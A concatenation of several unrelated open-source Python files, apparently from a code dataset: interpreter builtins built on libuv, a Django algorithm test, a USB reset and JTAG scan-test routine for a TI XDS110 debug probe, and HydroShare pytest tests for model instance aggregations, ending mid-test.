@Range.method(u"next", signature(Range))
def Range_next(self):
if self.current*self.sign < self.stop*self.sign:
i = self.current
self.current += self.step
return Integer(i)
raise StopIteration()
@builtin
@signature(Interface)
def super_(interface):
return interface.parent
#@builtin
#@signature(Object)
#def attach_debugger(debugger):
# ec = main.get_ec()
# ec.debug_hook = debugger
# return null
import rlibuv as uv
@builtin
@signature(space.Integer, optional=1)
def exit(obj):
ec = core.get_ec()
ec.exit_status = 0 if obj is None else int(obj.value)
uv.stop(ec.uv_loop)
ec.enqueue(ec.current) # Trick to ensure we get Discard -exception here
return core.switch([ec.eventloop]) # Once they are created.
@builtin
@signature()
def getcurrent():
return core.get_ec().current
@builtin
@signature()
def new_log():
queue = Queue()
if queue in core.g.log.loggers:
raise unwind(LError(u"queue has been registered twice."))
core.g.log.loggers.append(queue)
return queue
@builtin
def print_(argv):
core.g.log.other(u"info", List(argv))
return null
@builtin
@signature(Object, String, optional=1)
def info(value, type):
if type is None:
core.g.log.other(u"info", value)
else:
core.g.log.other(type.string, value)
return null
@builtin
@signature(Object)
def print_traceback(exception):
core.g.log.exception(exception)
return null
@builtin
@signature(Object)
def format_traceback(exception):
return String(format_traceback_raw(exception))
def format_traceback_raw(exception, in_exception_repr=False):
traceback = exception.getattr(u"traceback")
if not isinstance(traceback, space.List):
raise space.unwind(space.LError(u"Expected null or list as .traceback: %s" % traceback.repr()))
out = u""
if len(traceback.contents) > 0:
out = u"\033[31mTraceback:\033[36m\n"
for entry in reversed(traceback.contents):
if not isinstance(entry, TraceEntry):
continue
name, col0, lno0, col1, lno1 = entry.pc_location()
out += u" %s: %d,%d : %d,%d\n" % (name.repr(), lno0, col0, lno1, col1)
out += u"\033[31m"
out += space.get_interface(exception).name
out += u":\033[0m"
try:
return out + u" " + exception.repr()
except Unwinder as unwinder:
if in_exception_repr:
return out + u" ... Second error during exception repr"
return (out + u" ... Error during exception repr\n"
+ format_traceback_raw(unwinder.exception, True))
from rpython.rtyper.lltypesystem import rffi, lltype, llmemory
from rpython.rlib import rgil
import rlibuv as uv
import uv_callback
@builtin
@signature(Object, variadic=True)
def work(func, args):
if not core.g.work_pool:
# The function will be called in separate thread,
# so allocate GIL here
rgil.allocate()
core.g.work_pool = WorkPool()
req = lltype.malloc(uv.work_ptr.TO, flavor='raw', zero=True)
work = Work(func, args)
core.g.work_pool.push(req, work)
try:
response = uv_callback.after_work(req)
response.wait(uv.queue_work(response.ec.uv_loop, req,
work_cb, uv_callback.after_work.cb))
if work.unwinder:
raise work.unwinder
return work.retval
finally:
core.g.work_pool.pop(req)
lltype.free(req, flavor='raw')
def work_cb(handle):
work = core.g.work_pool.peek(handle)
#must_leave = False
# must_leave = space.threadlocals.try_enter_thread(space)
# Should check for separate threads here and crash
# if the callback comes from a thread that has no execution context.
try:
work.retval = work.func.call(work.args)
except Unwinder as unwinder:
work.unwinder = unwinder
except Exception as e:
try:
os.write(2, "SystemError: callback raised ")
os.write(2, str(e))
os.write(2, "\n")
except:
pass
# if must_leave:
# space.threadlocals.leave_thread(space)
class WorkPool:
def __init__(self):
self.table = {}
@jit.dont_look_inside
def peek(self, handle):
return self.table[rffi.cast_ptr_to_adr(handle)]
@jit.dont_look_inside
def push(self, handle, value):
self.table[rffi.cast_ptr_to_adr(handle)] = value
@jit.dont_look_inside
def pop(self, handle):
return self.table.pop(rffi.cast_ptr_to_adr(handle))
class Work:
def __init__(self, func, args):
self.func = func
self.args = args
self.retval = null
self.unwinder = None
@builtin
@signature(Integer)
def guess_handle(num):
return Integer(uv_stream.uv.guess_handle(num.value))
@builtin
@signature(Object)
def instantiate_(i):
if interface == Object:
return Exnihilo()
if isinstance(i, Interface):
return CustomObject(i)
raise OldError(u"Cannot instantiate from non-interface")
@builtin
@signature(Object)
def register_finalizer(obj):
core.g.finalizer_queue.register_finalizer(obj)
return null
# @builtin
# @signature(Object)
# def finalize_on_exit(obj):
# ec = core.get_ec()
# ec.must_finalize_on_quit[obj] = true
# return null
@builtin
def on_exit(argv):
ec = core.get_ec()
ec.on_exit.append(argv)
return null
|
advisor_server/suggestion/algorithm/base_hyperopt_algorithm_test.py | silvery107/advisor | 1,498 | 12729163 | from django.test import TestCase
from suggestion.algorithm.abstract_algorithm import AbstractSuggestionAlgorithm
from suggestion.algorithm.base_hyperopt_algorithm import BaseHyperoptAlgorithm
class BaseHyperoptAlgorithmTest(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_init(self):
instance = BaseHyperoptAlgorithm()
self.assertTrue(isinstance(instance, AbstractSuggestionAlgorithm))
self.assertEqual(instance.__class__, BaseHyperoptAlgorithm)
|
vkwave/bots/core/dispatching/extensions/callback/__init__.py | krasnovmv/vkwave | 222 | 12729230 | <filename>vkwave/bots/core/dispatching/extensions/callback/__init__.py
from ._aiohttp import AIOHTTPCallbackExtension
|
source/lib/probe.py | WinterWinds-Robotics/pymmw | 144 | 12729240 | <filename>source/lib/probe.py
#
# Copyright (c) 2019, <NAME>
# This file is licensed under the terms of the MIT license.
#
#
# xds110 support
#
import sys
import time
import array
from lib.ports import *
from lib.utility import *
from lib.shell import *
# ------------------------------------------
XDS_USB = (0x0451, 0xbef3)
# ------------------------------------------
def xds_reset(dev, delay=100):
#_ = {0:'CDC Communication',
# 1:'CDC Data', 2:'Vendor Specific', 3:'CDC Communication',
# 4:'CDC Data', 5:'Human Interface Device', 6:'Vendor Specific'}
ep = usb_point(dev, 2, 2)
if ep is None: return False
for v in ('00', '01') * 2:
ep.write(hex2dec('{} {} {} {}'.format('2a', '02', '00', '0e {}'.format(v))))
time.sleep(delay / 1000)
return True
# ------------------------------------------
__scan_test__ = (
'2a 01 00 01',
'2a 01 00 03', '2a 05 00 04 00 00 00 00',
'2a 01 00 06', '2a 02 00 05 00', '2a 05 00 07 88 13 00 00',
'2a 02 00 05 01', '2a 05 00 07 a0 86 01 00',
'2a 05 00 2b 01 00 00 00',
'2a 01 00 06', '2a 02 00 05 00', '2a 05 00 07 88 13 00 00',
'2a 02 00 05 01', '2a 05 00 07 a0 86 01 00', '2a 09 00 09 01 00 00 00 01 00 00 00',
'2a 01 00 1a',
'2a 01 00 2f',
'2a 01 00 02',
'2a 01 00 01',
'2a 01 00 03', '2a 05 00 04 00 00 00 00',
'2a 01 00 06', '2a 02 00 05 00', '2a 05 00 07 88 13 00 00',
'2a 02 00 05 01', '2a 05 00 07 a0 86 01 00',
'2a 05 00 2b 01 00 00 00',
'2a 10 00 0a 00 08 04 01 06 01 00 00 00 00 00 00 01 00 01',
'2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('ff ff ff ff',)*4*16)),
'2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('00 00 00 00',)*4*16)),
'2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('00 00 00 00',)*4*16)),
'2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('ff ff ff ff',)*4*16)),
'2a 10 00 0a 00 08 03 01 05 01 00 00 00 00 00 00 01 00 01',
'2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('ff ff ff ff',)*4*16)),
'2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('00 00 00 00',)*4*16)),
'2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('00 00 00 00',)*4*16)),
'2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('ff ff ff ff',)*4*16)),
'2a 15 00 0b 20 00 04 01 06 01 00 00 00 00 00 00 01 00 04 00 ff ff ff ff',
'2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('ff ff ff ff',)*4*16)),
'2a 15 00 0b 20 00 04 01 06 01 00 00 00 00 00 00 01 00 04 00 00 00 00 00',
'2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('00 00 00 00',)*4*16)),
'2a 15 00 0b 20 00 04 01 06 01 00 00 00 00 00 00 01 00 04 00 e2 e0 03 fe',
'2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('e2 e0 03 fe',)*4*16)),
'2a 15 00 0b 20 00 04 01 06 01 00 00 00 00 00 00 01 00 04 00 1d 1f fc 01',
'2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('1d 1f fc 01',)*4*16)),
'2a 15 00 0b 20 00 04 01 06 01 00 00 00 00 00 00 01 00 04 00 aa cc 33 55',
'2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('aa cc 33 55',)*4*16)),
'2a 15 00 0b 20 00 04 01 06 01 00 00 00 00 00 00 01 00 04 00 55 33 cc aa',
'2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('55 33 cc aa',)*4*16)),
'2a 10 00 0a 00 08 04 01 06 01 00 00 00 00 00 00 01 00 01',
'2a 01 00 08',
'2a 09 00 09 05 00 00 00 02 00 00 00',
'2a 15 00 0b 20 00 03 01 05 01 00 00 00 00 00 00 01 00 04 00 ff ff ff ff',
'2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('ff ff ff ff',)*4*16)),
'2a 15 00 0b 20 00 03 01 05 01 00 00 00 00 00 00 01 00 04 00 00 00 00 00',
'2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('00 00 00 00',)*4*16)),
'2a 15 00 0b 20 00 03 01 05 01 00 00 00 00 00 00 01 00 04 00 e2 e0 03 fe',
'2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('e2 e0 03 fe',)*4*16)),
'2a 15 00 0b 20 00 03 01 05 01 00 00 00 00 00 00 01 00 04 00 1d 1f fc 01',
'2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('1d 1f fc 01',)*4*16)),
'2a 15 00 0b 20 00 03 01 05 01 00 00 00 00 00 00 01 00 04 00 aa cc 33 55',
'2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('aa cc 33 55',)*4*16)),
'2a 15 00 0b 20 00 03 01 05 01 00 00 00 00 00 00 01 00 04 00 55 33 cc aa',
'2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('55 33 cc aa',)*4*16)),
'2a 01 00 1a',
'2a 01 00 2f',
'2a 01 00 02'
)
# ------------------------------------------
def xds_test(dev, reset=True):
if reset:
xds_reset(dev)
ep2o = usb_point(dev, 2, 2)
ep2i = usb_point(dev, 2, 3)
_ = dev.read(ep2i.bEndpointAddress, 1024)
def send(epo, msg, epi=None):
_ = epo.write(hex2dec(msg))
if epi is not None:
buf = dev.read(epi.bEndpointAddress, 1024)
return buf
return None
def collect(v):
res = send(ep2o, v, ep2i)
if res is not None:
if len(res) > 21:
res = set(res[8:])
if len(res) % 3 != 1: # super-lazy check
return False
return True
for entry in __scan_test__:
if not collect(entry):
raise Exception('integrity scan-test on the JTAG DR/IR has failed')
|
pytest/functional/hs_file_types/test_model_instance_aggregation.py | hydroshare/hydroshare | 178 | 12729245 | import os
import pytest
from django.core.exceptions import ValidationError
from django.core.files.uploadedfile import UploadedFile
from hs_core.hydroshare import add_file_to_resource, ResourceFile, add_resource_files
from hs_core.views.utils import move_or_rename_file_or_folder
from hs_file_types.forms import ModelInstanceMetadataValidationForm
from hs_file_types.models import (
ModelInstanceLogicalFile,
ModelProgramLogicalFile,
NetCDFLogicalFile,
GeoRasterLogicalFile,
GeoFeatureLogicalFile,
GenericLogicalFile,
TimeSeriesLogicalFile,
RefTimeseriesLogicalFile,
FileSetLogicalFile
)
@pytest.mark.django_db(transaction=True)
def test_link_model_aggregations_same_resource(composite_resource_with_mi_aggregation, mock_irods):
"""Test that we can link one model instance aggregation to one model program aggregation within the same resource"""
res, user = composite_resource_with_mi_aggregation
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr is not related to any model program aggregation
assert mi_aggr.metadata.executed_by is None
# create a model program aggregation
file_path = 'pytest/assets/logan.vrt'
upload_folder = ''
file_to_upload = UploadedFile(file=open(file_path, 'rb'),
name=os.path.basename(file_path))
res_file = add_file_to_resource(
res, file_to_upload, folder=upload_folder, check_target_folder=True
)
assert ModelProgramLogicalFile.objects.count() == 0
# set file to model program aggregation type
ModelProgramLogicalFile.set_file_type(res, user, res_file.id)
assert ModelProgramLogicalFile.objects.count() == 1
mp_aggr = ModelProgramLogicalFile.objects.first()
# link model instance aggregation to model program aggregation
mi_validation_form = ModelInstanceMetadataValidationForm(data={"executed_by": mp_aggr.id}, user=user, resource=res)
assert mi_validation_form.is_valid()
mi_validation_form.update_metadata(metadata=mi_aggr.metadata)
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr is related to model program aggregation
assert mi_aggr.metadata.executed_by is not None
assert not res.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_model_instance_on_model_program_delete(composite_resource_with_mi_aggregation, mock_irods):
"""Test that when we remove/delete a model program aggregation that the linked model instance aggregation does not
get deleted and the metadata of the model instance aggregation is set to dirty"""
res, user = composite_resource_with_mi_aggregation
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr is not related to any model program aggregation
assert mi_aggr.metadata.executed_by is None
# create a model program aggregation
file_path = 'pytest/assets/logan.vrt'
upload_folder = ''
file_to_upload = UploadedFile(file=open(file_path, 'rb'),
name=os.path.basename(file_path))
res_file = add_file_to_resource(
res, file_to_upload, folder=upload_folder, check_target_folder=True
)
assert ModelProgramLogicalFile.objects.count() == 0
# set file to model program aggregation type
ModelProgramLogicalFile.set_file_type(res, user, res_file.id)
assert ModelProgramLogicalFile.objects.count() == 1
mp_aggr = ModelProgramLogicalFile.objects.first()
# link model instance aggregation to model program aggregation
mi_validation_form = ModelInstanceMetadataValidationForm(data={"executed_by": mp_aggr.id}, user=user, resource=res)
assert mi_validation_form.is_valid()
mi_validation_form.update_metadata(metadata=mi_aggr.metadata)
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr is related to model program aggregation
assert mi_aggr.metadata.executed_by is not None
assert mi_aggr.metadata.is_dirty is True
# remove/delete mp_aggregation
mp_aggr.remove_aggregation()
assert ModelProgramLogicalFile.objects.count() == 0
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr is not related to any model program aggregation
assert mi_aggr.metadata.executed_by is None
# check that mi_aggr metadata is set to dirty
assert mi_aggr.metadata.is_dirty is True
assert not res.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_model_instance_on_model_program_rename_1(composite_resource_with_mi_aggregation, mock_irods):
"""Test that when we rename a file that represents a model program aggregation then the linked model instance
aggregation metadata is set to dirty"""
res, user = composite_resource_with_mi_aggregation
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr is not related to any model program aggregation
assert mi_aggr.metadata.executed_by is None
# create a model program aggregation
file_path = 'pytest/assets/logan.vrt'
upload_folder = ''
file_to_upload = UploadedFile(file=open(file_path, 'rb'),
name=os.path.basename(file_path))
res_file = add_file_to_resource(
res, file_to_upload, folder=upload_folder, check_target_folder=True
)
assert ModelProgramLogicalFile.objects.count() == 0
# set file to model program aggregation type
ModelProgramLogicalFile.set_file_type(res, user, res_file.id)
assert ModelProgramLogicalFile.objects.count() == 1
mp_aggr = ModelProgramLogicalFile.objects.first()
# link model instance aggregation to model program aggregation
mi_validation_form = ModelInstanceMetadataValidationForm(data={"executed_by": mp_aggr.id}, user=user, resource=res)
assert mi_validation_form.is_valid()
mi_validation_form.update_metadata(metadata=mi_aggr.metadata)
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr is related to model program aggregation
assert mi_aggr.metadata.executed_by is not None
assert mi_aggr.metadata.is_dirty is True
# rename the model program file name
src_path = 'data/contents/{}'.format(res_file.file_name)
tgt_path = 'data/contents/{}'.format("logan_1.vrt")
move_or_rename_file_or_folder(user, res.short_id, src_path, tgt_path)
assert ModelProgramLogicalFile.objects.count() == 1
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr metadata is set to dirty
assert mi_aggr.metadata.is_dirty is True
assert not res.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_model_instance_on_model_program_rename_2(composite_resource_with_mi_aggregation, mock_irods):
"""Test that when we rename a folder that represents a model program aggregation then the linked model instance
aggregation metadata is set to dirty"""
res, user = composite_resource_with_mi_aggregation
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr is not related to any model program aggregation
assert mi_aggr.metadata.executed_by is None
# create a model program aggregation
file_path = 'pytest/assets/logan.vrt'
mp_folder = "mp_folder"
ResourceFile.create_folder(res, mp_folder)
file_to_upload = UploadedFile(file=open(file_path, 'rb'),
name=os.path.basename(file_path))
add_file_to_resource(
res, file_to_upload, folder=mp_folder, check_target_folder=True
)
assert ModelProgramLogicalFile.objects.count() == 0
# set file to model program aggregation type
ModelProgramLogicalFile.set_file_type(res, user, folder_path=mp_folder)
assert ModelProgramLogicalFile.objects.count() == 1
mp_aggr = ModelProgramLogicalFile.objects.first()
# link model instance aggregation to model program aggregation
mi_validation_form = ModelInstanceMetadataValidationForm(data={"executed_by": mp_aggr.id}, user=user, resource=res)
assert mi_validation_form.is_valid()
mi_validation_form.update_metadata(metadata=mi_aggr.metadata)
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr is related to model program aggregation
assert mi_aggr.metadata.executed_by is not None
assert mi_aggr.metadata.is_dirty is True
# rename the model program file name
src_path = 'data/contents/{}'.format(mp_folder)
tgt_path = 'data/contents/{}'.format("{}_1".format(mp_folder))
move_or_rename_file_or_folder(user, res.short_id, src_path, tgt_path)
assert ModelProgramLogicalFile.objects.count() == 1
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr metadata is set to dirty
assert mi_aggr.metadata.is_dirty is True
assert not res.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_set_metadata(composite_resource_with_mi_aggregation, mock_irods):
"""Test that we can store all metadata items for a model instance aggregation"""
res, _ = composite_resource_with_mi_aggregation
mi_aggr = ModelInstanceLogicalFile.objects.first()
# test extra metadata
assert not mi_aggr.metadata.extra_metadata
extra_meta = {'key1': 'value 1', 'key2': 'value 2'}
mi_aggr.metadata.extra_metadata = extra_meta
mi_aggr.metadata.save()
assert mi_aggr.metadata.extra_metadata == extra_meta
# test keywords
assert not mi_aggr.metadata.keywords
keywords = ['kw-1', 'kw-2']
mi_aggr.metadata.keywords = keywords
mi_aggr.metadata.save()
assert mi_aggr.metadata.keywords == keywords
# test coverage metadata
assert not mi_aggr.metadata.coverages.all()
value_dict = {'name': 'Name for period coverage', 'start': '1/1/2000', 'end': '12/12/2012'}
temp_cov = mi_aggr.metadata.create_element('coverage', type='period', value=value_dict)
assert temp_cov.value['name'] == 'Name for period coverage'
assert temp_cov.value['start'] == '1/1/2000'
assert temp_cov.value['end'] == '12/12/2012'
assert mi_aggr.metadata.coverages.all().count() == 1
value_dict = {'east': '56.45678', 'north': '12.6789', 'units': 'Decimal degree'}
spatial_cov = mi_aggr.metadata.create_element('coverage', type='point', value=value_dict)
assert spatial_cov.value['projection'] == 'WGS 84 EPSG:4326'
assert spatial_cov.value['units'] == 'Decimal degree'
assert spatial_cov.value['north'] == 12.6789
assert spatial_cov.value['east'] == 56.45678
assert mi_aggr.metadata.coverages.all().count() == 2
# test model output metadata
assert not mi_aggr.metadata.has_model_output
mi_aggr.metadata.has_model_output = True
mi_aggr.metadata.save()
# test setting metadata json
assert not mi_aggr.metadata.metadata_json
# set mi metadata json from the content of the following file
schema_file_path = 'pytest/assets/mi_metadata.json'
with open(schema_file_path, 'r') as file_obj:
meta_json = file_obj.read()
assert len(meta_json) > 0
mi_aggr.metadata.metadata_json = meta_json
mi_aggr.metadata.save()
mi_aggr = ModelInstanceLogicalFile.objects.first()
assert mi_aggr.metadata.metadata_json
assert not res.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_auto_netcdf_aggregation_creation(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Test that when a netcdf file is uploaded to a folder that represents a model instance aggregation,
a netcdf aggregation is created automatically"""
resource, _ = composite_resource_with_mi_aggregation_folder
mi_aggr_path = ModelInstanceLogicalFile.objects.first().aggregation_name
assert NetCDFLogicalFile.objects.count() == 0
# upload a netcdf file to the mi_aggr_path - folder that represents the model instance aggregation
nc_file_name = "netcdf_valid.nc"
netcdf_file_path = "hs_file_types/tests/{}".format(nc_file_name)
_add_files_to_resource(resource=resource, files_to_add=[netcdf_file_path], upload_folder=mi_aggr_path)
# there should be three resource file - one generated by netcdf aggregation
assert resource.files.all().count() == 3
assert NetCDFLogicalFile.objects.count() == 1
# the netcdf file added to the model instance folder should be part of a new netcdf aggregation
nc_res_file = ResourceFile.get(resource=resource,
file=nc_file_name, folder=mi_aggr_path)
assert nc_res_file.has_logical_file
# the netcdf aggregation should contain 2 files - nc and the txt files
assert NetCDFLogicalFile.objects.first().files.count() == 2
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_auto_raster_aggregation_creation(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Test that when a raster file (.tif) is uploaded to a folder that represents a model instance aggregation,
a raster aggregation is created automatically"""
resource, _ = composite_resource_with_mi_aggregation_folder
mi_aggr_path = ModelInstanceLogicalFile.objects.first().aggregation_name
assert GeoRasterLogicalFile.objects.count() == 0
# upload a raster file to the mi_aggr_path - folder that represents the model instance aggregation
raster_file_name = 'small_logan.tif'
raster_file_path = 'hs_file_types/tests/{}'.format(raster_file_name)
_add_files_to_resource(resource=resource, files_to_add=[raster_file_path], upload_folder=mi_aggr_path)
# there should be three resource files ( one extra vrt file added as part of raster aggregation creation)
assert resource.files.all().count() == 3
# there should be one raster aggregation now
assert GeoRasterLogicalFile.objects.count() == 1
# the tif file added to the model instance folder should be part of a new raster aggregation
raster_res_file = ResourceFile.get(resource=resource,
file=raster_file_name, folder=mi_aggr_path)
assert raster_res_file.has_logical_file
# the raster aggregation should contain 2 files (tif and vrt)
assert GeoRasterLogicalFile.objects.first().files.count() == 2
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_auto_geofeature_aggregation_creation(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Test that when files that represents a geofeature are uploaded to a folder that
represents a model instance, a geofeature aggregation is created automatically"""
resource, _ = composite_resource_with_mi_aggregation_folder
mi_aggr_path = ModelInstanceLogicalFile.objects.first().aggregation_name
assert GeoFeatureLogicalFile.objects.count() == 0
# upload all 4 geo feature files the mi_aggr_ptah - folder that represents the model instance aggregation
base_data_file_path = 'hs_file_types/tests/data/{}'
shp_file_name = "states.shp"
shp_file_path = base_data_file_path.format(shp_file_name)
shx_file_name = "states.shx"
shx_file_path = base_data_file_path.format(shx_file_name)
dbf_file_name = "states.dbf"
dbf_file_path = base_data_file_path.format(dbf_file_name)
prj_file_name = "states.prj"
prj_file_path = base_data_file_path.format(prj_file_name)
geo_feature_files = [shp_file_path, shx_file_path, dbf_file_path, prj_file_path]
_add_files_to_resource(resource=resource, files_to_add=geo_feature_files, upload_folder=mi_aggr_path)
# there should be five resource files
assert resource.files.all().count() == 5
# the shp file added to the model instance folder should be part of a new geo feature aggregation
shp_res_file = ResourceFile.get(resource=resource, file=shp_file_name, folder=mi_aggr_path)
assert shp_res_file.has_logical_file
# the geo feature aggregation should contain 4 files that we uploaded
assert GeoFeatureLogicalFile.objects.first().files.count() == 4
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_auto_timeseries_aggregation_creation(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Test that when a timeseries sqlite file is uploaded to a folder that
represents a model instance, a timeseries aggregation is created automatically from that sqlite file"""
resource, _ = composite_resource_with_mi_aggregation_folder
mi_aggr_path = ModelInstanceLogicalFile.objects.first().aggregation_name
assert TimeSeriesLogicalFile.objects.count() == 0
# upload a sqlite file to the mi_aggr_path - folder that represents the model instance aggregation
sqlite_file_name = 'ODM2_Multi_Site_One_Variable.sqlite'
sqlite_file_path = 'hs_file_types/tests/data/{}'.format(sqlite_file_name)
_add_files_to_resource(resource=resource, files_to_add=[sqlite_file_path], upload_folder=mi_aggr_path)
# there should be 2 resource files
assert resource.files.all().count() == 2
# the sqlite file added to the model instance folder should be part of a new timeseries aggregation
sqlite_res_file = ResourceFile.get(resource=resource,
file=sqlite_file_name, folder=mi_aggr_path)
assert sqlite_res_file.has_logical_file
assert TimeSeriesLogicalFile.objects.count() == 1
assert ModelInstanceLogicalFile.objects.first().files.count() == 1
# the timeseries aggregation should contain 1 file
assert TimeSeriesLogicalFile.objects.first().files.count() == 1
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_auto_ref_timeseries_aggregation_creation(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Test that when a ref timeseries json file is uploaded to a folder that
represents a model instance aggregation, a ref timeseries aggregation is created automatically
from that json file"""
resource, _ = composite_resource_with_mi_aggregation_folder
assert ModelInstanceLogicalFile.objects.first().files.count() == 1
mi_aggr_path = ModelInstanceLogicalFile.objects.first().aggregation_name
assert RefTimeseriesLogicalFile.objects.count() == 0
# upload a ref timeseries json file to the mi_aggr_path - folder that represents the model instance aggregation
ref_timeseries_file_name = 'multi_sites_formatted_version1.0.refts.json'
ref_timeseries_file_path = 'hs_file_types/tests/{}'.format(ref_timeseries_file_name)
_add_files_to_resource(resource=resource, files_to_add=[ref_timeseries_file_path], upload_folder=mi_aggr_path)
# there should be 2 resource files
assert resource.files.all().count() == 2
# the json file added to the model instance folder should be part of a new ref timeseries aggregation
ref_ts_res_file = ResourceFile.get(resource=resource,
file=ref_timeseries_file_name, folder=mi_aggr_path)
assert ref_ts_res_file.has_logical_file
assert RefTimeseriesLogicalFile.objects.count() == 1
assert ModelInstanceLogicalFile.objects.first().files.count() == 1
# ref timeseries aggregation should contain 1 file
assert RefTimeseriesLogicalFile.objects.first().files.count() == 1
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_canot_create_fileset_within_mi_aggregation(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Test that one can't create a fileset aggregation inside a folder that represents a model instance aggregation"""
resource, user = composite_resource_with_mi_aggregation_folder
mi_aggr_path = ModelInstanceLogicalFile.objects.first().aggregation_name
file_path = 'pytest/assets/logan.vrt'
fs_folder = 'fileset_folder'
fs_folder_path = os.path.join(mi_aggr_path, fs_folder)
ResourceFile.create_folder(resource, fs_folder)
_add_files_to_resource(resource=resource, files_to_add=[file_path], upload_folder=fs_folder_path)
# trying to set folder to fileset logical file type (aggregation) should fail
assert FileSetLogicalFile.objects.count() == 0
with pytest.raises(ValidationError):
FileSetLogicalFile.set_file_type(resource, user, folder_path=fs_folder_path)
assert FileSetLogicalFile.objects.count() == 0
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_canot_create_mi_aggregation_within_mi_aggregation(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Test that one can't create a model instance aggregation inside a folder that represents a model
instance aggregation"""
resource, user = composite_resource_with_mi_aggregation_folder
mi_aggr_path = ModelInstanceLogicalFile.objects.first().aggregation_name
assert ModelInstanceLogicalFile.objects.count() == 1
file_path = 'pytest/assets/logan.vrt'
mi_sub_folder = 'mi_sub_folder'
mi_sub_folder_path = os.path.join(mi_aggr_path, mi_sub_folder)
ResourceFile.create_folder(resource, mi_sub_folder)
_add_files_to_resource(resource=resource, files_to_add=[file_path], upload_folder=mi_sub_folder_path)
# trying to set folder to model instance should fail
assert ModelInstanceLogicalFile.objects.count() == 1
with pytest.raises(ValidationError):
ModelInstanceLogicalFile.set_file_type(resource, user, folder_path=mi_sub_folder_path)
assert ModelInstanceLogicalFile.objects.count() == 1
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_move_single_file_aggr_into_model_instance_aggregation(composite_resource, mock_irods):
""" test that we can move a single file aggregation into a folder that represents a
model instance aggregation"""
res, user = composite_resource
file_path = 'pytest/assets/generic_file.txt'
mi_folder = 'mi_folder'
ResourceFile.create_folder(res, mi_folder)
file_to_upload = UploadedFile(file=open(file_path, 'rb'),
name=os.path.basename(file_path))
add_file_to_resource(res, file_to_upload, folder=mi_folder, check_target_folder=True)
assert res.files.count() == 1
# at this point there should not be any model instance aggregation
assert ModelInstanceLogicalFile.objects.count() == 0
# set folder to model instance aggregation type
ModelInstanceLogicalFile.set_file_type(resource=res, user=user, folder_path=mi_folder)
res_file = res.files.first()
assert res_file.has_logical_file
# file has folder
